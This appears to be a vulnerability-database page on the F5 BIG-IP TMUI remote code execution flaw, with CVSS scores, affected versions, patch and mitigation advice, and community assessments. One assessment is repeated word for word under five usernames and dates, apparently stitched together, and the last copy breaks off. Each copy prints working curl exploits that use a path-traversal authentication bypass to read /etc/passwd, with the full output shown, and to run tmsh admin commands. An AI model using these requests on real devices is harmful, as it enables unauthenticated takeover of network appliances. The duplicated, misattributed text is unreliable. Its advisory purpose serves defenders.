CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
100.0%
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
Recent assessments:
kevthehermit at July 03, 2020 5:30pm UTC reported:
This one is Critical to patch quickly with a CVSS Score of 10.
If an attacker can gain access to the TMUI Configuration utility port they can gain unauthenticated Remote Code Execution. All version of Big IP from 11.x through 15.x are vulnerable.
Patches are out but F5 have also listed a set of Mitigation techniques to reduce the attack surface. This takes it from Unathenticated RCE to Authenticated RCE, Which is still bad.
Refer to the F5 Article for details. – <https://support.f5.com/csp/article/K52145254>
If you are using AWS, Azure, GCP cloud images Check the version number is fully patched against the correct version numbers.
15.1.0.2-0.0.9
Within 24 hours this has been exploited in the wild with simple to replicate Proof Of Concepts.
The core of this vulnerability lies in a path traversal that leads to auth bypass. With this you can use built in functions to gain file read / write or you can access the web based shell to create accounts with shell access.
Here are some redacted examples. The redaction will be removed once more details are public.
Enough information is now public that I am removing the redaction. The following examples show:
File read
File Write
tmsh access
curl --insecure ‘https://f5-bigip.home.lab:8443/tmui/login.jsp/…;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd’
{“output”:“root:x:0:0:root:/root:/sbin/nologin\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\ntmshnobody:x:32765:32765:tmshnobody:/:/sbin/nologin\nadmin:x:0:500:Admin User:/home/admin:/bin/bash\nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin\ndbus:x:81:81:System message bus:/:/sbin/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:/:/sbin/nologin\nsystemd-network:x:192:192:systemd Network Management:/:/sbin/nologin\npolkitd:x:27:27:User for polkitd:/:/sbin/nologin\nnslcd:x:65:55:LDAP Client User:/:/sbin/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin\npostgres:x:26:26:PostgreSQL Server:/var/local/pgsql/data:/sbin/nologin\ntomcat:x:91:91:Apache Tomcat:/usr/share/tomcat:/sbin/nologin\nhsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\nrpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin\nntp:x:38:38::/etc/ntp:/sbin/nologin\nf5_remoteuser:x:499:499:f5 remote user account:/home/f5_remoteuser:/sbin/nologin\ntcpdump:x:72:72::/:/sbin/nologin\noprofile:x:16:16:Special user account to be used by OProfile:/:/sbin/nologin\nsdm:x:191:996:sdmuser:/var/sdm:/bin/false\nnamed:x:25:25:Named:/var/named:/bin/false\napache:x:48:48:Apache:/usr/local/www:/sbin/nologin\nsyscheck:x:199:10::/:/sbin/nologin\nmysql:x:98:98:MySQL server:/var/lib/mysql:/sbin/nologin\nrestnoded:x:198:198::/:/sbin/nologin\nGuest:x:16110:500:Guest:/home/Guest:/sbin/nologin\n”}%
This doesn’t only affect the login.jsp path it can be used from anywhere.
curl --insecure 'https://f5-bigip.home.lab:8443/tmui/tmui/login/welcome.jsp/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
{"output":"root:x:0:0:root:\/root:\/sbin\/nologin\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\nmail:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin\noperator:x:11:0:operator:\/root:\/sbin\/nologin\nnobody:x:99:99:Nobody:\/:\/sbin\/nologin\ntmshnobody:x:32765:32765:tmshnobody:\/:\/sbin\/nologin\nadmin:x:0:500:Admin User:\/home\/admin:\/bin\/bash\nvcsa:x:69:69:virtual console memory owner:\/dev:\/sbin\/nologin\ndbus:x:81:81:System message bus:\/:\/sbin\/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:\/:\/sbin\/nologin\nsystemd-network:x:192:192:systemd Network Management:\/:\/sbin\/nologin\npolkitd:x:27:27:User for polkitd:\/:\/sbin\/nologin\nnslcd:x:65:55:LDAP Client User:\/:\/sbin\/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:\/dev\/null:\/sbin\/nologin\npostgres:x:26:26:PostgreSQL Server:\/var\/local\/pgsql\/data:\/sbin\/nologin\ntomcat:x:91:91:Apache Tomcat:\/usr\/share\/tomcat:\/sbin\/nologin\nhsqldb:x:96:96::\/var\/lib\/hsqldb:\/sbin\/nologin\nsshd:x:74:74:Privilege-separated SSH:\/var\/empty\/sshd:\/sbin\/nologin\nrpc:x:32:32:Rpcbind Daemon:\/var\/lib\/rpcbind:\/sbin\/nologin\nntp:x:38:38::\/etc\/ntp:\/sbin\/nologin\nf5_remoteuser:x:499:499:f5 remote user account:\/home\/f5_remoteuser:\/sbin\/nologin\ntcpdump:x:72:72::\/:\/sbin\/nologin\noprofile:x:16:16:Special user account to be used by OProfile:\/:\/sbin\/nologin\nsdm:x:191:996:sdmuser:\/var\/sdm:\/bin\/false\nnamed:x:25:25:Named:\/var\/named:\/bin\/false\napache:x:48:48:Apache:\/usr\/local\/www:\/sbin\/nologin\nsyscheck:x:199:10::\/:\/sbin\/nologin\nmysql:x:98:98:MySQL server:\/var\/lib\/mysql:\/sbin\/nologin\nrestnoded:x:198:198::\/:\/sbin\/nologin\nGuest:x:16110:500:Guest:\/home\/Guest:\/sbin\/nologin\n"}
curl --insecure 'https://f5-bigip.home.lab:8443/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
Mad-robot at July 05, 2020 1:21pm UTC reported:
This one is Critical to patch quickly with a CVSS Score of 10.
If an attacker can gain access to the TMUI Configuration utility port they can gain unauthenticated Remote Code Execution. All version of Big IP from 11.x through 15.x are vulnerable.
Patches are out but F5 have also listed a set of Mitigation techniques to reduce the attack surface. This takes it from Unathenticated RCE to Authenticated RCE, Which is still bad.
Refer to the F5 Article for details. – <https://support.f5.com/csp/article/K52145254>
If you are using AWS, Azure, GCP cloud images Check the version number is fully patched against the correct version numbers.
15.1.0.2-0.0.9
Within 24 hours this has been exploited in the wild with simple to replicate Proof Of Concepts.
The core of this vulnerability lies in a path traversal that leads to auth bypass. With this you can use built in functions to gain file read / write or you can access the web based shell to create accounts with shell access.
Here are some redacted examples. The redaction will be removed once more details are public.
Enough information is now public that I am removing the redaction. The following examples show:
File read
File Write
tmsh access
curl --insecure ‘https://f5-bigip.home.lab:8443/tmui/login.jsp/…;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd’
{“output”:“root:x:0:0:root:/root:/sbin/nologin\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\ntmshnobody:x:32765:32765:tmshnobody:/:/sbin/nologin\nadmin:x:0:500:Admin User:/home/admin:/bin/bash\nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin\ndbus:x:81:81:System message bus:/:/sbin/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:/:/sbin/nologin\nsystemd-network:x:192:192:systemd Network Management:/:/sbin/nologin\npolkitd:x:27:27:User for polkitd:/:/sbin/nologin\nnslcd:x:65:55:LDAP Client User:/:/sbin/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin\npostgres:x:26:26:PostgreSQL Server:/var/local/pgsql/data:/sbin/nologin\ntomcat:x:91:91:Apache Tomcat:/usr/share/tomcat:/sbin/nologin\nhsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\nrpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin\nntp:x:38:38::/etc/ntp:/sbin/nologin\nf5_remoteuser:x:499:499:f5 remote user account:/home/f5_remoteuser:/sbin/nologin\ntcpdump:x:72:72::/:/sbin/nologin\noprofile:x:16:16:Special user account to be used by OProfile:/:/sbin/nologin\nsdm:x:191:996:sdmuser:/var/sdm:/bin/false\nnamed:x:25:25:Named:/var/named:/bin/false\napache:x:48:48:Apache:/usr/local/www:/sbin/nologin\nsyscheck:x:199:10::/:/sbin/nologin\nmysql:x:98:98:MySQL server:/var/lib/mysql:/sbin/nologin\nrestnoded:x:198:198::/:/sbin/nologin\nGuest:x:16110:500:Guest:/home/Guest:/sbin/nologin\n”}%
This doesn’t only affect the login.jsp path it can be used from anywhere.
curl --insecure 'https://f5-bigip.home.lab:8443/tmui/tmui/login/welcome.jsp/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
{"output":"root:x:0:0:root:\/root:\/sbin\/nologin\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\nmail:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin\noperator:x:11:0:operator:\/root:\/sbin\/nologin\nnobody:x:99:99:Nobody:\/:\/sbin\/nologin\ntmshnobody:x:32765:32765:tmshnobody:\/:\/sbin\/nologin\nadmin:x:0:500:Admin User:\/home\/admin:\/bin\/bash\nvcsa:x:69:69:virtual console memory owner:\/dev:\/sbin\/nologin\ndbus:x:81:81:System message bus:\/:\/sbin\/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:\/:\/sbin\/nologin\nsystemd-network:x:192:192:systemd Network Management:\/:\/sbin\/nologin\npolkitd:x:27:27:User for polkitd:\/:\/sbin\/nologin\nnslcd:x:65:55:LDAP Client User:\/:\/sbin\/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:\/dev\/null:\/sbin\/nologin\npostgres:x:26:26:PostgreSQL Server:\/var\/local\/pgsql\/data:\/sbin\/nologin\ntomcat:x:91:91:Apache Tomcat:\/usr\/share\/tomcat:\/sbin\/nologin\nhsqldb:x:96:96::\/var\/lib\/hsqldb:\/sbin\/nologin\nsshd:x:74:74:Privilege-separated SSH:\/var\/empty\/sshd:\/sbin\/nologin\nrpc:x:32:32:Rpcbind Daemon:\/var\/lib\/rpcbind:\/sbin\/nologin\nntp:x:38:38::\/etc\/ntp:\/sbin\/nologin\nf5_remoteuser:x:499:499:f5 remote user account:\/home\/f5_remoteuser:\/sbin\/nologin\ntcpdump:x:72:72::\/:\/sbin\/nologin\noprofile:x:16:16:Special user account to be used by OProfile:\/:\/sbin\/nologin\nsdm:x:191:996:sdmuser:\/var\/sdm:\/bin\/false\nnamed:x:25:25:Named:\/var\/named:\/bin\/false\napache:x:48:48:Apache:\/usr\/local\/www:\/sbin\/nologin\nsyscheck:x:199:10::\/:\/sbin\/nologin\nmysql:x:98:98:MySQL server:\/var\/lib\/mysql:\/sbin\/nologin\nrestnoded:x:198:198::\/:\/sbin\/nologin\nGuest:x:16110:500:Guest:\/home\/Guest:\/sbin\/nologin\n"}
curl --insecure 'https://f5-bigip.home.lab:8443/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
ccondon-r7 at July 04, 2020 10:41pm UTC reported:
This one is Critical to patch quickly with a CVSS Score of 10.
If an attacker can gain access to the TMUI Configuration utility port they can gain unauthenticated Remote Code Execution. All version of Big IP from 11.x through 15.x are vulnerable.
Patches are out but F5 have also listed a set of Mitigation techniques to reduce the attack surface. This takes it from Unathenticated RCE to Authenticated RCE, Which is still bad.
Refer to the F5 Article for details. – <https://support.f5.com/csp/article/K52145254>
If you are using AWS, Azure, GCP cloud images Check the version number is fully patched against the correct version numbers.
15.1.0.2-0.0.9
Within 24 hours this has been exploited in the wild with simple to replicate Proof Of Concepts.
The core of this vulnerability lies in a path traversal that leads to auth bypass. With this you can use built in functions to gain file read / write or you can access the web based shell to create accounts with shell access.
Here are some redacted examples. The redaction will be removed once more details are public.
Enough information is now public that I am removing the redaction. The following examples show:
File read
File Write
tmsh access
curl --insecure ‘https://f5-bigip.home.lab:8443/tmui/login.jsp/…;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd’
{“output”:“root:x:0:0:root:/root:/sbin/nologin\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\ntmshnobody:x:32765:32765:tmshnobody:/:/sbin/nologin\nadmin:x:0:500:Admin User:/home/admin:/bin/bash\nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin\ndbus:x:81:81:System message bus:/:/sbin/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:/:/sbin/nologin\nsystemd-network:x:192:192:systemd Network Management:/:/sbin/nologin\npolkitd:x:27:27:User for polkitd:/:/sbin/nologin\nnslcd:x:65:55:LDAP Client User:/:/sbin/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin\npostgres:x:26:26:PostgreSQL Server:/var/local/pgsql/data:/sbin/nologin\ntomcat:x:91:91:Apache Tomcat:/usr/share/tomcat:/sbin/nologin\nhsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\nrpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin\nntp:x:38:38::/etc/ntp:/sbin/nologin\nf5_remoteuser:x:499:499:f5 remote user account:/home/f5_remoteuser:/sbin/nologin\ntcpdump:x:72:72::/:/sbin/nologin\noprofile:x:16:16:Special user account to be used by OProfile:/:/sbin/nologin\nsdm:x:191:996:sdmuser:/var/sdm:/bin/false\nnamed:x:25:25:Named:/var/named:/bin/false\napache:x:48:48:Apache:/usr/local/www:/sbin/nologin\nsyscheck:x:199:10::/:/sbin/nologin\nmysql:x:98:98:MySQL server:/var/lib/mysql:/sbin/nologin\nrestnoded:x:198:198::/:/sbin/nologin\nGuest:x:16110:500:Guest:/home/Guest:/sbin/nologin\n”}%
This doesn’t only affect the login.jsp path it can be used from anywhere.
curl --insecure 'https://f5-bigip.home.lab:8443/tmui/tmui/login/welcome.jsp/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
{"output":"root:x:0:0:root:\/root:\/sbin\/nologin\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\nmail:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin\noperator:x:11:0:operator:\/root:\/sbin\/nologin\nnobody:x:99:99:Nobody:\/:\/sbin\/nologin\ntmshnobody:x:32765:32765:tmshnobody:\/:\/sbin\/nologin\nadmin:x:0:500:Admin User:\/home\/admin:\/bin\/bash\nvcsa:x:69:69:virtual console memory owner:\/dev:\/sbin\/nologin\ndbus:x:81:81:System message bus:\/:\/sbin\/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:\/:\/sbin\/nologin\nsystemd-network:x:192:192:systemd Network Management:\/:\/sbin\/nologin\npolkitd:x:27:27:User for polkitd:\/:\/sbin\/nologin\nnslcd:x:65:55:LDAP Client User:\/:\/sbin\/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:\/dev\/null:\/sbin\/nologin\npostgres:x:26:26:PostgreSQL Server:\/var\/local\/pgsql\/data:\/sbin\/nologin\ntomcat:x:91:91:Apache Tomcat:\/usr\/share\/tomcat:\/sbin\/nologin\nhsqldb:x:96:96::\/var\/lib\/hsqldb:\/sbin\/nologin\nsshd:x:74:74:Privilege-separated SSH:\/var\/empty\/sshd:\/sbin\/nologin\nrpc:x:32:32:Rpcbind Daemon:\/var\/lib\/rpcbind:\/sbin\/nologin\nntp:x:38:38::\/etc\/ntp:\/sbin\/nologin\nf5_remoteuser:x:499:499:f5 remote user account:\/home\/f5_remoteuser:\/sbin\/nologin\ntcpdump:x:72:72::\/:\/sbin\/nologin\noprofile:x:16:16:Special user account to be used by OProfile:\/:\/sbin\/nologin\nsdm:x:191:996:sdmuser:\/var\/sdm:\/bin\/false\nnamed:x:25:25:Named:\/var\/named:\/bin\/false\napache:x:48:48:Apache:\/usr\/local\/www:\/sbin\/nologin\nsyscheck:x:199:10::\/:\/sbin\/nologin\nmysql:x:98:98:MySQL server:\/var\/lib\/mysql:\/sbin\/nologin\nrestnoded:x:198:198::\/:\/sbin\/nologin\nGuest:x:16110:500:Guest:\/home\/Guest:\/sbin\/nologin\n"}
curl --insecure 'https://f5-bigip.home.lab:8443/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
busterb at July 06, 2020 2:29am UTC reported:
This one is Critical to patch quickly with a CVSS Score of 10.
If an attacker can gain access to the TMUI Configuration utility port they can gain unauthenticated Remote Code Execution. All version of Big IP from 11.x through 15.x are vulnerable.
Patches are out but F5 have also listed a set of Mitigation techniques to reduce the attack surface. This takes it from Unathenticated RCE to Authenticated RCE, Which is still bad.
Refer to the F5 Article for details. – <https://support.f5.com/csp/article/K52145254>
If you are using AWS, Azure, GCP cloud images Check the version number is fully patched against the correct version numbers.
15.1.0.2-0.0.9
Within 24 hours this has been exploited in the wild with simple to replicate Proof Of Concepts.
The core of this vulnerability lies in a path traversal that leads to auth bypass. With this you can use built in functions to gain file read / write or you can access the web based shell to create accounts with shell access.
Here are some redacted examples. The redaction will be removed once more details are public.
Enough information is now public that I am removing the redaction. The following examples show:
File read
File Write
tmsh access
curl --insecure ‘https://f5-bigip.home.lab:8443/tmui/login.jsp/…;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd’
{“output”:“root:x:0:0:root:/root:/sbin/nologin\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\ntmshnobody:x:32765:32765:tmshnobody:/:/sbin/nologin\nadmin:x:0:500:Admin User:/home/admin:/bin/bash\nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin\ndbus:x:81:81:System message bus:/:/sbin/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:/:/sbin/nologin\nsystemd-network:x:192:192:systemd Network Management:/:/sbin/nologin\npolkitd:x:27:27:User for polkitd:/:/sbin/nologin\nnslcd:x:65:55:LDAP Client User:/:/sbin/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin\npostgres:x:26:26:PostgreSQL Server:/var/local/pgsql/data:/sbin/nologin\ntomcat:x:91:91:Apache Tomcat:/usr/share/tomcat:/sbin/nologin\nhsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\nrpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin\nntp:x:38:38::/etc/ntp:/sbin/nologin\nf5_remoteuser:x:499:499:f5 remote user account:/home/f5_remoteuser:/sbin/nologin\ntcpdump:x:72:72::/:/sbin/nologin\noprofile:x:16:16:Special user account to be used by OProfile:/:/sbin/nologin\nsdm:x:191:996:sdmuser:/var/sdm:/bin/false\nnamed:x:25:25:Named:/var/named:/bin/false\napache:x:48:48:Apache:/usr/local/www:/sbin/nologin\nsyscheck:x:199:10::/:/sbin/nologin\nmysql:x:98:98:MySQL server:/var/lib/mysql:/sbin/nologin\nrestnoded:x:198:198::/:/sbin/nologin\nGuest:x:16110:500:Guest:/home/Guest:/sbin/nologin\n”}%
This doesn’t only affect the login.jsp path it can be used from anywhere.
curl --insecure 'https://f5-bigip.home.lab:8443/tmui/tmui/login/welcome.jsp/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
{"output":"root:x:0:0:root:\/root:\/sbin\/nologin\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\nmail:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin\noperator:x:11:0:operator:\/root:\/sbin\/nologin\nnobody:x:99:99:Nobody:\/:\/sbin\/nologin\ntmshnobody:x:32765:32765:tmshnobody:\/:\/sbin\/nologin\nadmin:x:0:500:Admin User:\/home\/admin:\/bin\/bash\nvcsa:x:69:69:virtual console memory owner:\/dev:\/sbin\/nologin\ndbus:x:81:81:System message bus:\/:\/sbin\/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:\/:\/sbin\/nologin\nsystemd-network:x:192:192:systemd Network Management:\/:\/sbin\/nologin\npolkitd:x:27:27:User for polkitd:\/:\/sbin\/nologin\nnslcd:x:65:55:LDAP Client User:\/:\/sbin\/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:\/dev\/null:\/sbin\/nologin\npostgres:x:26:26:PostgreSQL Server:\/var\/local\/pgsql\/data:\/sbin\/nologin\ntomcat:x:91:91:Apache Tomcat:\/usr\/share\/tomcat:\/sbin\/nologin\nhsqldb:x:96:96::\/var\/lib\/hsqldb:\/sbin\/nologin\nsshd:x:74:74:Privilege-separated SSH:\/var\/empty\/sshd:\/sbin\/nologin\nrpc:x:32:32:Rpcbind Daemon:\/var\/lib\/rpcbind:\/sbin\/nologin\nntp:x:38:38::\/etc\/ntp:\/sbin\/nologin\nf5_remoteuser:x:499:499:f5 remote user account:\/home\/f5_remoteuser:\/sbin\/nologin\ntcpdump:x:72:72::\/:\/sbin\/nologin\noprofile:x:16:16:Special user account to be used by OProfile:\/:\/sbin\/nologin\nsdm:x:191:996:sdmuser:\/var\/sdm:\/bin\/false\nnamed:x:25:25:Named:\/var\/named:\/bin\/false\napache:x:48:48:Apache:\/usr\/local\/www:\/sbin\/nologin\nsyscheck:x:199:10::\/:\/sbin\/nologin\nmysql:x:98:98:MySQL server:\/var\/lib\/mysql:\/sbin\/nologin\nrestnoded:x:198:198::\/:\/sbin\/nologin\nGuest:x:16110:500:Guest:\/home\/Guest:\/sbin\/nologin\n"}
curl --insecure 'https://f5-bigip.home.lab:8443/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
gwillcox-r7 at October 20, 2020 5:49pm UTC reported:
This one is Critical to patch quickly with a CVSS Score of 10.
If an attacker can gain access to the TMUI Configuration utility port they can gain unauthenticated Remote Code Execution. All version of Big IP from 11.x through 15.x are vulnerable.
Patches are out but F5 have also listed a set of Mitigation techniques to reduce the attack surface. This takes it from Unathenticated RCE to Authenticated RCE, Which is still bad.
Refer to the F5 Article for details. – <https://support.f5.com/csp/article/K52145254>
If you are using AWS, Azure, GCP cloud images Check the version number is fully patched against the correct version numbers.
15.1.0.2-0.0.9
Within 24 hours this has been exploited in the wild with simple to replicate Proof Of Concepts.
The core of this vulnerability lies in a path traversal that leads to auth bypass. With this you can use built in functions to gain file read / write or you can access the web based shell to create accounts with shell access.
Here are some redacted examples. The redaction will be removed once more details are public.
Enough information is now public that I am removing the redaction. The following examples show:
File read
File Write
tmsh access
curl --insecure ‘https://f5-bigip.home.lab:8443/tmui/login.jsp/…;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd’
{“output”:“root:x:0:0:root:/root:/sbin/nologin\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\ntmshnobody:x:32765:32765:tmshnobody:/:/sbin/nologin\nadmin:x:0:500:Admin User:/home/admin:/bin/bash\nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin\ndbus:x:81:81:System message bus:/:/sbin/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:/:/sbin/nologin\nsystemd-network:x:192:192:systemd Network Management:/:/sbin/nologin\npolkitd:x:27:27:User for polkitd:/:/sbin/nologin\nnslcd:x:65:55:LDAP Client User:/:/sbin/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin\npostgres:x:26:26:PostgreSQL Server:/var/local/pgsql/data:/sbin/nologin\ntomcat:x:91:91:Apache Tomcat:/usr/share/tomcat:/sbin/nologin\nhsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\nrpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin\nntp:x:38:38::/etc/ntp:/sbin/nologin\nf5_remoteuser:x:499:499:f5 remote user account:/home/f5_remoteuser:/sbin/nologin\ntcpdump:x:72:72::/:/sbin/nologin\noprofile:x:16:16:Special user account to be used by OProfile:/:/sbin/nologin\nsdm:x:191:996:sdmuser:/var/sdm:/bin/false\nnamed:x:25:25:Named:/var/named:/bin/false\napache:x:48:48:Apache:/usr/local/www:/sbin/nologin\nsyscheck:x:199:10::/:/sbin/nologin\nmysql:x:98:98:MySQL server:/var/lib/mysql:/sbin/nologin\nrestnoded:x:198:198::/:/sbin/nologin\nGuest:x:16110:500:Guest:/home/Guest:/sbin/nologin\n”}%
This doesn’t only affect the login.jsp path it can be used from anywhere.
curl --insecure 'https://f5-bigip.home.lab:8443/tmui/tmui/login/welcome.jsp/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
{"output":"root:x:0:0:root:\/root:\/sbin\/nologin\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\nmail:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin\noperator:x:11:0:operator:\/root:\/sbin\/nologin\nnobody:x:99:99:Nobody:\/:\/sbin\/nologin\ntmshnobody:x:32765:32765:tmshnobody:\/:\/sbin\/nologin\nadmin:x:0:500:Admin User:\/home\/admin:\/bin\/bash\nvcsa:x:69:69:virtual console memory owner:\/dev:\/sbin\/nologin\ndbus:x:81:81:System message bus:\/:\/sbin\/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:\/:\/sbin\/nologin\nsystemd-network:x:192:192:systemd Network Management:\/:\/sbin\/nologin\npolkitd:x:27:27:User for polkitd:\/:\/sbin\/nologin\nnslcd:x:65:55:LDAP Client User:\/:\/sbin\/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:\/dev\/null:\/sbin\/nologin\npostgres:x:26:26:PostgreSQL Server:\/var\/local\/pgsql\/data:\/sbin\/nologin\ntomcat:x:91:91:Apache Tomcat:\/usr\/share\/tomcat:\/sbin\/nologin\nhsqldb:x:96:96::\/var\/lib\/hsqldb:\/sbin\/nologin\nsshd:x:74:74:Privilege-separated SSH:\/var\/empty\/sshd:\/sbin\/nologin\nrpc:x:32:32:Rpcbind Daemon:\/var\/lib\/rpcbind:\/sbin\/nologin\nntp:x:38:38::\/etc\/ntp:\/sbin\/nologin\nf5_remoteuser:x:499:499:f5 remote user account:\/home\/f5_remoteuser:\/sbin\/nologin\ntcpdump:x:72:72::\/:\/sbin\/nologin\noprofile:x:16:16:Special user account to be used by 